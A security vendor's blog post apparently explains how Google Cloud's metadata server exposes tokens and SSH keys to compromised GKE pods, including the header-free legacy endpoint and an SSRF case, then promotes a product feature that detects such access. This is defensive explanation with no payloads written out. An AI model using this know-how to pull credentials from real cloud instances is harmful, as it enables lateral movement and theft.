In this post I’ll address the issue around accessible internal data in current cloud providers. Cloud platforms generally expose some form of metadata to machines or container instances, such as information about the environment, the project information and even sensitive pieces like tokens and SSH keys.

From a developer perspective this is a convenient perk when designing programs for these platforms. However, from a security standpoint, exposing information about the environment, not to mention secrets, can be hazardous.

By nature, containerized environments make it harder for an attacker to spread out after breaching one vulnerable instance, because it generally only includes the program itself and its data. For example, a nginx container should include only the nginx binaries, configuration files and logs. After a successful attack to such a container, an attacker can only damage this particular instance, and has no clue what else is available in the cluster.

Metadata such as that exposed by cloud platforms can aid an attacker in pivoting to a much bigger attacker. Names and specifics of machines in the same environment can hint the attacker what further attacks may be possible. Keys, secrets and tokens exposed can be used to actively breach other instances.

What kind of data is available?

For the sake of this post let’s examine specifically what metadata available for Google Cloud instances. The official documentation can be found here.

The data is accessible from an HTTP metadata server at http://metadata.google.internal/computeMetadata. The responses are in text form (application/text) but it is possible to change that to JSON instead. The documentation the v1 metadata server, which requires a specific header that must be added to HTTP requests (Metadata-Flavor: Google). However the old metadata server, v1beta1, is still accessible without this header.

The examples shown below are from an Ubuntu pod on my GKE cluster I started to simulate what an attacker could access after breaching one pod.

One recent example for an attack using this metadata server was disclosed an HackerOne report on Shopify’s infrastructure. In this exploit chain the attacker relies on an SSRF vulnerability to access internal cluster metadata, that eventually leads to full root access on all of the cluster’s instances.

Kubernetes solution

Google is well aware of the risks of pods accessing metadata. As mentioned by the previous report, Google suggests a solution to the issue by enabling the metadata concealment to then Kubernetes cluster, a feature available from Kubernetes 1.9.3. See Google’s documentation on enabling this feature. Note however that this is only a temporary solution while Google’s engineers are working on a more thorough resolution.

Twistlock’s Kubernetes protection

Twistlock has a feature to detect and alert on suspicious behavior in Kubernetes pods, that could used in the event of an attack.

This feature uses a variety of heuristics applied to Kubernetes API data, pod egress traffic, and API master payload to detect attacks like this and many others. It detects attempts to access Google cloud metadata from unprivileged pods. As demonstrated earlier, these attempts could suggest that an attacker is attempting to breach the cluster or trying to obtain access to other pods. If this is the case, Twistlock will create an incident report.

If you see something like this, it’s indicative of a pod compromise and requires deeper investigation. Of course, Twistlock has many layers of defense in depth at runtime to prevent this in the first place and reviewing other activity for this container in Incident Explorer is a good place to start.

The feature, labeled “Kubernetes advanced protection” is enabled by a creating a Runtime rule and enabling the “Detect Kubernetes attacks” switch.

To test the protection in effect, you can pop up a shell and attempt to access internal metadata resources, for instance, http://metadata.google.internal/computeMetadata:

Finally, Twistlock will alert on an attempted Kubernetes attack:

Final note

Our Twistlock Labs research team is continuously monitoring the state of the art in Kubernetes attacks, in addition to performing its own first party research. The logic and lessons from these public and internal sources flow out through the Intelligence Stream keeping customer environments protected against emerging threats.

← Back to All Posts Next Post →